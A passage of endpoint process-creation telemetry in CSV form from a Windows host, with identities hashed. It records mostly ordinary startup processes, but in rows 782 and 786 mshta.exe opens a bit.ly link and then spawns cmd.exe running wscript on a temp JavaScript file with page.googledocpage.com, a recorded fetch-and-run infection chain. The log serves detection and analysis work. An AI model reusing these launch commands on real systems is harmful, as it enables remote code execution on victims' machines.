+777,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:40.477041800+00:00,18820,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,5549280,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:40.495183800+00:00,2021-06-24 00:53:50.862967900+00:00,c9944aef-8e97-4b7e-9596-4f3e99d84a1e,computerpii_0a470890c60768167990033d701e7bd881398861,168342,False,10.7740.19041.1052,False,11540474045175127,,11540474045175229,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,,,,,,
+778,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:40.546030300+00:00,10668,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=18820",PortableExecutable,2021-05-28 05:59:00+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,5549280,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:40.477041800+00:00,18820,AdobeCollabSync.exe,"""AdobeCollabSync.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:40.674356700+00:00,2021-06-24 00:53:50.863197400+00:00,3391da1e-b962-43e1-bb67-c1ce81f45063,computerpii_0a470890c60768167990033d701e7bd881398861,168347,False,10.7740.19041.1052,False,11540474045175229,,11540474045175230,2021-06-24 00:52:40.477041800+00:00,18820,2021-06-24 00:52:40.477041800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,18820,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 00:52:40.482920+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+779,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:40.992619+00:00,14292,runonce.exe,runonce.exe /Run6432,PortableExecutable,2021-02-17 04:35:32.235216+00:00,C:\Windows\SysWOW64\runonce.exe,47104,7430ccc7226a6ff76b6d55b96f6ce53c,0babaeacf9d0aa4e6fbea6943b9916425746fb702b6501c47f4470fd195836af,49b01fd1a1590320332c8c766c098bae6b1c01dd,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:41.089517500+00:00,2021-06-24 00:53:50.863480600+00:00,b5405770-e05c-4ca1-9559-ad4eb13160da,computerpii_0a470890c60768167990033d701e7bd881398861,168354,False,10.7740.19041.1052,False,11540474045175127,,11540474045175231,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,explorer.exe,18420,256,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RunOnce,RUNONCE.EXE,Run Once Wrapper
+780,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:41.466982300+00:00,14792,Teams.exe,"""Teams.exe"" --checkInstall --source=PROPLUS",PortableExecutable,2020-09-16 12:13:44+00:00,C:\Program Files (x86)\Teams Installer\Teams.exe,101284632,5c86e37766dd71f7bc27477cd057496f,c302f8d223cec2af255b1dd896a3cf0da1aaaf1d8b4ce5dae59be8de9daead44,bffdd972ad367a9922aac5e0999884446891cc9f,7430ccc7226a6ff76b6d55b96f6ce53c,0babaeacf9d0aa4e6fbea6943b9916425746fb702b6501c47f4470fd195836af,49b01fd1a1590320332c8c766c098bae6b1c01dd,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:40.992619+00:00,14292,runonce.exe,runonce.exe /Run6432,False,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:41.511208400+00:00,2021-06-24 00:53:50.863629800+00:00,dd0e5f17-3e83-401d-8ba5-6e5171193c25,computerpii_0a470890c60768167990033d701e7bd881398861,168358,False,10.7740.19041.1052,False,11540474045175231,,11540474045175233,2021-06-24 00:52:40.992619+00:00,14292,2021-06-24 00:52:40.992619+00:00,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,14292,16512,ActiveProcessStartkey,C:\Windows\SysWOW64,47104,1994-09-12 02:37:52+00:00,2021-02-17 04:35:32.236243+00:00,2021-06-24 00:52:41.004372900+00:00,2021-02-17 04:35:32.235216+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RunOnce,RUNONCE.EXE,Run Once Wrapper,Microsoft Corporation,Microsoft Teams,1.3.00.26064,Setup.exe,Setup.exe,Microsoft Teams
+781,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:41.997705100+00:00,16580,acrotray.exe,"""acrotray.exe"" ",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe,5296352,73d9fdd6ba9f5634ce8ab8b1f54abbd9,ee19864aa66a2dee5fcefa1f298498d8244b021294f2000a6e702b9e17ebddc1,20002f924780ab3595dd8c307e785ad429b4512c,7430ccc7226a6ff76b6d55b96f6ce53c,0babaeacf9d0aa4e6fbea6943b9916425746fb702b6501c47f4470fd195836af,49b01fd1a1590320332c8c766c098bae6b1c01dd,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:40.992619+00:00,14292,runonce.exe,runonce.exe /Run6432,False,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:42.069263900+00:00,2021-06-24 00:53:50.863749700+00:00,9597ec8c-ff4c-4c17-bc0c-028b4b533393,computerpii_0a470890c60768167990033d701e7bd881398861,168361,False,10.7740.19041.1052,False,11540474045175231,,11540474045175234,2021-06-24 00:52:40.992619+00:00,14292,2021-06-24 00:52:40.992619+00:00,\Device\HarddiskVolume3\Windows\SysWOW64\runonce.exe,14292,128,ActiveProcessStartkey,C:\Windows\SysWOW64,47104,1994-09-12 02:37:52+00:00,2021-02-17 04:35:32.236243+00:00,2021-06-24 00:52:41.004372900+00:00,2021-02-17 04:35:32.235216+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RunOnce,RUNONCE.EXE,Run Once Wrapper,Adobe Systems Inc.,AcroTray - Adobe Acrobat Distiller helper application.,21.5.20048.436468,AcroTray,AcroTray.exe,AcroTray
+782,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:42.683357400+00:00,12960,mshta.exe,"""mshta.exe"" https://bit.ly/3zGwwx7",PortableExecutable,2019-12-07 09:09:39.756421400+00:00,C:\Windows\System32\mshta.exe,14848,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:42.720567300+00:00,2021-06-24 00:53:50.864384700+00:00,4cb9a20d-c823-4f00-8eea-fa8545369f50,computerpii_0a470890c60768167990033d701e7bd881398861,168377,False,10.7740.19041.1052,False,11540474045175127,,11540474045175235,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,explorer.exe,18420,256,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host
+783,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:42.869133300+00:00,20668,wlrmdr.exe, -c -s 0 -f 0 -t Empty -m Empty -a 10 -u Empty,PortableExecutable,2021-02-17 04:34:46.345022800+00:00,C:\Windows\System32\wlrmdr.exe,68184,ef9bba7a637a11b224a90bf90a8943ac,2fda95aafb2e9284c730bf912b93f60a75b151941adc14445ed1e056140325b1,4747ec6efd2d41e049159249c2d888189bb33d1d,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:04:14.036541300+00:00,11720,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-23 11:04:13.923843100+00:00,14724,smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:42.898498400+00:00,2021-06-24 00:53:50.864457200+00:00,414d3c6d-9984-4eda-b3f0-0f64e9c1f121,computerpii_0a470890c60768167990033d701e7bd881398861,168379,False,10.7740.19041.1052,False,11540474045175072,,11540474045175236,2021-06-23 11:04:14.036541300+00:00,11720,2021-06-23 11:04:14.036541300+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,11720,18560,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-23 11:04:14.025533400+00:00,2021-04-14 01:10:22.046876900+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,WLRMNDR.EXE,WLRMNDR.EXE,Windows logon reminder
+784,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:43.083788900+00:00,18228,taskhostw.exe,taskhostw.exe SyncFromCloud,PortableExecutable,2021-04-14 01:10:22.932389100+00:00,C:\Windows\System32\taskhostw.exe,97096,564e4806ab18f93b93d551cd10c1598e,0322728dbce3a577c4a13b907ad7375d27e74880b63f7371384f67d19197a0ad,fed4b4a753a9541389aa670c69e624be07569ccd,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:43.097734700+00:00,2021-06-24 00:53:50.864526+00:00,b5339a5d-77bc-40d4-a807-17b31536aa83,computerpii_0a470890c60768167990033d701e7bd881398861,168381,False,10.7740.19041.1052,False,11540474045136925,,11540474045175237,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,taskhostw.exe,taskhostw.exe,Host Process for Windows Tasks
+785,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:49.796031600+00:00,15604,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --enable-sandbox --native-window-open --preload=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar\lib\renderer\experienceRenderer\FilePII_81eb8107464d558b2d7094d41551620aa9ac0a03.js"" --background-color=#fff --guest-instance-id=5 --enable-blink-features --disable-blink-features --hidden-page --node-integration-in-subframes --enable-websql --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:1 --msteams-process-type=experience-renderer",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:49.836034200+00:00,2021-06-24 00:53:50.866337300+00:00,5370717b-a91e-4d74-809d-39d6057045f1,computerpii_0a470890c60768167990033d701e7bd881398861,168426,False,10.7740.19041.1052,False,11540474045175219,,11540474045175241,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+786,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:50.216364400+00:00,19032,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_10d1d2b896863c6d41ba2b8a7824ab2ab7efd140.js"" page.googledocpage.com/ 2",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,0b4340ed812dc82ce636c00fa5c9bef2,dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895,51c97ebe601ef079b16bcd87af827b0be5283d96,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:42.683357400+00:00,12960,mshta.exe,"""mshta.exe"" https://bit.ly/3zGwwx7",False,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:50.247643300+00:00,2021-06-24 00:53:50.866469+00:00,8f89a7be-e30b-4226-91b7-977c2f785927,computerpii_0a470890c60768167990033d701e7bd881398861,168429,False,10.7740.19041.1052,False,11540474045175235,,11540474045175243,2021-06-24 00:52:42.683357400+00:00,12960,2021-06-24 00:52:42.683357400+00:00,\Device\HarddiskVolume3\Windows\System32\mshta.exe,12960,18560,TerminateProcessStartkey,C:\Windows\System32,14848,1979-10-11 17:42:52+00:00,2019-12-07 09:09:39.756421400+00:00,2021-06-24 00:52:42.687230900+00:00,2019-12-07 09:09:39.756421400+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,0.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Internet Explorer,11.00.19041.1,MSHTA.EXE,MSHTA.EXE,Microsoft (R) HTML Application host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+787,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:50.224887500+00:00,8916,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:50.216364400+00:00,19032,cmd.exe,"""cmd.exe"" /c start /b wscript 